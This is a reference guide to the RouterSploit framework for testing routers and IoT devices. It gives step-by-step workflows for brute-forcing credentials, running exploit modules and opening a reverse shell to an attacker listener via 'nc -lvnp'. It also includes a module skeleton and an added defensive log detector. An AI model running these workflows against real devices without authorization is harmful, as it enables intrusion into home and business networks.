# RouterSploit

## Overview

RouterSploit is an open-source exploitation framework designed for testing embedded devices, routers, and IoT equipment. It provides a modular approach to vulnerability assessment, credential testing, and exploitation of network devices, similar to Metasploit but specialized for router and embedded-device penetration testing.
## Installation

### Ubuntu/Debian

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip install -r requirements.txt
python3 rsf.py
```

### macOS

```bash
brew install python3
git clone https://github.com/threat9/routersploit.git
cd routersploit
pip3 install -r requirements.txt
python3 rsf.py
```

### Docker

```bash
docker run -it threat9/routersploit
```

### From Source

```bash
git clone https://github.com/threat9/routersploit.git
cd routersploit
python3 setup.py install
python3 rsf.py
```
## Starting the Interactive Console

```bash
python3 rsf.py
# RouterSploit> prompt appears
```
## Basic Commands

| Command | Description |
|---|---|
| help | Display all available commands |
| show modules | List all available modules |
| search [keyword] | Search modules by name or description |
| use [module] | Load a specific module |
| info | Display module information and options |
| set [option] [value] | Configure module options |
| back | Exit current module |
| show options | Display current module options |
| exploit or run | Execute the current module |
| exit | Exit RouterSploit |
## Module Types

### Exploits

Modules that exploit vulnerabilities to gain unauthorized access or control:

```
use exploits/d-link/dir_815_rce
use exploits/netgear/cmd_injection
use exploits/tp-link/authentication_bypass
use exploits/cisco/arbitrary_file_upload
```

### Credential Testing

Modules for testing default credentials and brute-forcing:

```
use creds/telnet_bruteforce
use creds/ssh_bruteforce
use creds/http_bruteforce
use creds/default_creds
```

### Scanners

Modules that scan for vulnerabilities without exploiting them:

```
use scanners/autopwn
use scanners/port_scanner
use scanners/service_scanner
use scanners/vulnerability_scanner
```

### Payloads

Modules for generating and delivering payloads:

```
use payloads/reverse_shell
use payloads/bind_shell
```
## Searching and Listing Modules

### Search by Keyword

```
search d-link
search rce
search authentication
search remote_code_execution
```

### List All Modules

```
show modules
show modules | grep exploit
show modules | grep creds
show modules | grep scanner
```

### Get Module Details

```
use exploits/netgear/cmd_injection
info
# Shows: description, options, required fields, vendor info
```
## Working with Exploits

### Basic Exploit Workflow

```
# 1. Search for relevant exploit
search netgear
# 2. Load the module
use exploits/netgear/cmd_injection
# 3. View options
show options
# LHOST (attacker IP), LPORT (listener port), TARGET (target IP)
# 4. Set required options
set target 192.168.1.1
set lhost 192.168.1.100
set lport 4444
# 5. Execute exploit
exploit
# or
run
```

### Setting Target Information

```
set target 192.168.1.1
set target http://192.168.1.1:8080
set rhost 192.168.1.1   # Remote host
```

### Setting Payload Options

```
set lhost 192.168.1.100   # Listener/attacker host
set lport 4444            # Listener port
set lpass password123     # Listener password
set payload reverse_shell
```

### Viewing Exploit Requirements

```
info
# Shows which options are required vs optional
show options
```
## Credential Testing

### Default Credential Testing

```
use creds/default_creds
set target 192.168.1.1
set vendor netgear
exploit
```

### Brute-Force Attack

```
use creds/telnet_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/passwords.txt
exploit
```

### HTTP Credential Brute-Force

```
use creds/http_bruteforce
set target 192.168.1.1
set username admin
set wordlist /path/to/wordlist.txt
set threads 4
exploit
```

### SSH Brute-Force

```
use creds/ssh_bruteforce
set target 192.168.1.1
set port 22
set username root
set wordlist /path/to/passwords.txt
exploit
```
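The default-credential and brute-force modules above leave a clear trace on the device: a burst of failed logins from one source, sometimes followed by a success once a default or guessed password works. As an added example (not part of this page or of RouterSploit), the following Python detector runs over constructed router syslog lines; the dropbear and BusyBox login message formats are assumptions for the sample.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample router syslog (dropbear SSH and BusyBox telnet login);
# the line formats are assumptions for this example, not RouterSploit output.
SAMPLE_LOG = """\
Jan 10 09:12:01 router dropbear[812]: Bad password attempt for 'admin' from 192.168.1.100:51002
Jan 10 09:12:01 router dropbear[813]: Bad password attempt for 'admin' from 192.168.1.100:51003
Jan 10 09:12:02 router dropbear[814]: Bad password attempt for 'root' from 192.168.1.100:51004
Jan 10 09:12:03 router login[820]: FAILED LOGIN on 'pts/0' FOR 'admin' from 192.168.1.100, Authentication failure
Jan 10 09:12:03 router login[821]: FAILED LOGIN on 'pts/0' FOR 'admin' from 192.168.1.100, Authentication failure
Jan 10 09:12:04 router dropbear[822]: Password auth succeeded for 'admin' from 192.168.1.100:51010
Jan 10 09:30:15 router dropbear[900]: Bad password attempt for 'admin' from 192.168.1.50:40001
"""

TS = r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ "
FAIL_RE = re.compile(TS + r"(?:dropbear|login)\[\d+\]: (?:Bad password attempt for "
                     r"'(?P<u1>[^']+)' from (?P<ip1>[\d.]+)|FAILED LOGIN .* FOR "
                     r"'(?P<u2>[^']+)' from (?P<ip2>[\d.]+))")
OK_RE = re.compile(TS + r"dropbear\[\d+\]: Password auth succeeded for "
                   r"'(?P<user>[^']+)' from (?P<ip>[\d.]+)")

def _ts(s):  # syslog lines carry no year; the sample assumes a fixed one
    return datetime.strptime("2024 " + s, "%Y %b %d %H:%M:%S")

def detect_credential_sweep(log_text, window_s=60, threshold=5):
    """Flag per-source failed-login bursts and any success that follows one."""
    failures = defaultdict(list)  # source ip -> [(time, username)]
    alerts = []
    for line in log_text.splitlines():
        if m := FAIL_RE.match(line):
            ip = m.group("ip1") or m.group("ip2")
            failures[ip].append((_ts(m.group("ts")), m.group("u1") or m.group("u2")))
        elif m := OK_RE.match(line):
            ip, t = m.group("ip"), _ts(m.group("ts"))
            recent = [u for ft, u in failures[ip] if (t - ft).total_seconds() <= window_s]
            if len(recent) >= threshold:  # a guessed or default password just worked
                alerts.append({"ip": ip, "kind": "success_after_burst",
                               "user": m.group("user"), "failures": len(recent)})
    for ip, events in failures.items():
        events.sort()
        for i, (t0, _) in enumerate(events):  # sliding window over each source's failures
            in_window = [e for e in events[i:] if (e[0] - t0).total_seconds() <= window_s]
            if len(in_window) >= threshold:
                alerts.append({"ip": ip, "kind": "failed_login_burst", "failures": len(in_window),
                               "users": sorted({u for _, u in in_window})})
                break
    return alerts
```

With the sample, 192.168.1.100 produces both a `failed_login_burst` alert and a `success_after_burst` alert, while the single failure from 192.168.1.50 stays below the threshold.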
## Scanner Modules

### AutoPwn Scanner

Automatically scans for vulnerabilities and attempts exploitation:

```
use scanners/autopwn
set target 192.168.1.1
exploit
# Scans for known vulnerabilities and exploitation paths
```

### Port Scanner

Identifies open ports on the target:

```
use scanners/port_scanner
set target 192.168.1.1
set ports 1-1000
exploit
```

### Service Detection

Identifies services and versions:

```
use scanners/service_scanner
set target 192.168.1.1
exploit
```

### Vulnerability Scanner

Scans for known vulnerabilities:

```
use scanners/vulnerability_scanner
set target 192.168.1.1
set vendor netgear
exploit
```
## Supported Vendors

RouterSploit includes modules for major router and embedded device manufacturers:

| Vendor | Common Vulnerabilities |
|---|---|
| D-Link | Directory traversal, RCE, auth bypass |
| Netgear | Command injection, authenticated RCE |
| TP-Link | Authentication bypass, RCE |
| Cisco | File upload, auth bypass, buffer overflow |
| Huawei | Authentication bypass, RCE |
| Ubiquiti | Authentication bypass, RCE |
| Linksys | Command injection, firmware upload |
| Belkin | Default credentials, auth bypass |
| ASUS | Arbitrary file upload, RCE |
| Mikrotik | Authentication bypass, RCE |
## Common Workflows

### Reconnaissance and Exploitation

```
# Step 1: Scan target network
use scanners/port_scanner
set target 192.168.1.1
exploit
# Step 2: Identify device and run AutoPwn
use scanners/autopwn
set target 192.168.1.1
exploit
# Step 3: Attempt default credentials
use creds/default_creds
set target 192.168.1.1
exploit
```

### Targeted Exploitation

```
# Know target device? Search directly
search "TP-Link WR841N"
# Load specific exploit
use exploits/tp-link/wr841n_rce
# Set options
set target 192.168.1.1
set lhost 192.168.1.100
# Execute
exploit
```

### Credential Harvesting

```
# Multiple credential testing approaches
use creds/default_creds
set target 192.168.1.1
exploit
# Then brute-force remaining services
use creds/telnet_bruteforce
set target 192.168.1.1
exploit
```

### Post-Exploitation Shell Access

```
# After successful exploit, obtain shell
# Set up listener (in separate terminal)
nc -lvnp 4444
# In RouterSploit, execute reverse shell payload
set payload reverse_shell
set lhost 192.168.1.100
set lport 4444
exploit
# Shell connects to listener
```
## Custom Module Creation

### Module Structure

Create a custom exploit under `routersploit/modules/exploits/custom/`. The skeleton below follows the framework's own module conventions (`__info__` metadata, `Opt*` option types, `run()` as the entry point and `check()` for a non-destructive test):

```python
from routersploit.core.exploit import *
from routersploit.core.http.http_client import HTTPClient


class Exploit(HTTPClient):
    """Custom Router Exploitation Module (HTTP-based)"""

    # Metadata shown by the `info` command
    __info__ = {
        "name": "Custom Router RCE",
        "description": "Custom exploitation module description",
        "authors": ("Your Name",),
        "references": ("Advisory URL goes here",),
        "devices": ("Custom Vendor Custom Model 1.0",),
    }

    # Options exposed through `show options` / `set`
    target = OptIP("", "Target IPv4, IPv6 address or file with ip:port (file://)")
    port = OptPort(80, "Target port")

    def run(self):
        """Entry point for `exploit` / `run`"""
        if self.check():
            print_success("Target is vulnerable")
            # Exploitation logic goes here
        else:
            print_error("Target is not vulnerable")

    @mute
    def check(self):
        """Return True if vulnerable, False if not, None if undetermined"""
        response = self.http_request(method="GET", path="/")
        if response is None:
            return None  # no answer from the target: cannot tell
        # Vulnerability check logic goes here (e.g. inspect response.text)
        return False
```
## RouterSploit vs Metasploit

| Feature | RouterSploit | Metasploit |
|---|---|---|
| Focus | Routers/IoT | General penetration testing |
| Learning Curve | Lower | Higher |
| Module Availability | Router-specific | Extensive (all targets) |
| Ease of Use | Simpler | More complex |
| Customization | Good | Excellent |
| Community | Smaller | Large |
| Target Scope | Embedded/Router | Broad |
| Price | Free | Free community version |
## Advanced Options

### Setting Threads for Brute-Force

```
use creds/http_bruteforce
set threads 10
# Increases concurrent attempts
```

### Custom Wordlists

```
set wordlist /path/to/custom/passwords.txt
set username_wordlist /path/to/usernames.txt
```

### Timeout Configuration

```
set timeout 10
# Increases response wait time for slow networks
```

### Logging Output

```
exploit > output.log
# Capture results to file
```
## Troubleshooting

| Issue | Solution |
|---|---|
| Module not found | Use search to find correct module name |
| Connection refused | Verify target IP and port accessibility |
| Exploit fails silently | Run info to verify all required options set |
| Slow brute-force | Increase threads parameter |
| Python import errors | Reinstall dependencies: pip install -r requirements.txt |
## Security Considerations

- Always obtain written permission before testing
- Use on devices you own or have explicit authorization to test
- RouterSploit should only be used for authorized security assessments
- Document all findings and exploitation attempts
- Disable unnecessary services on production routers
- Regularly update firmware on network devices
- Change default credentials immediately after device setup
## Resources

- Official GitHub: https://github.com/threat9/routersploit
- Module documentation in repository
- Vulnerability research databases (CVE, NVD)
- Vendor security advisories
- IoT security blogs and research papers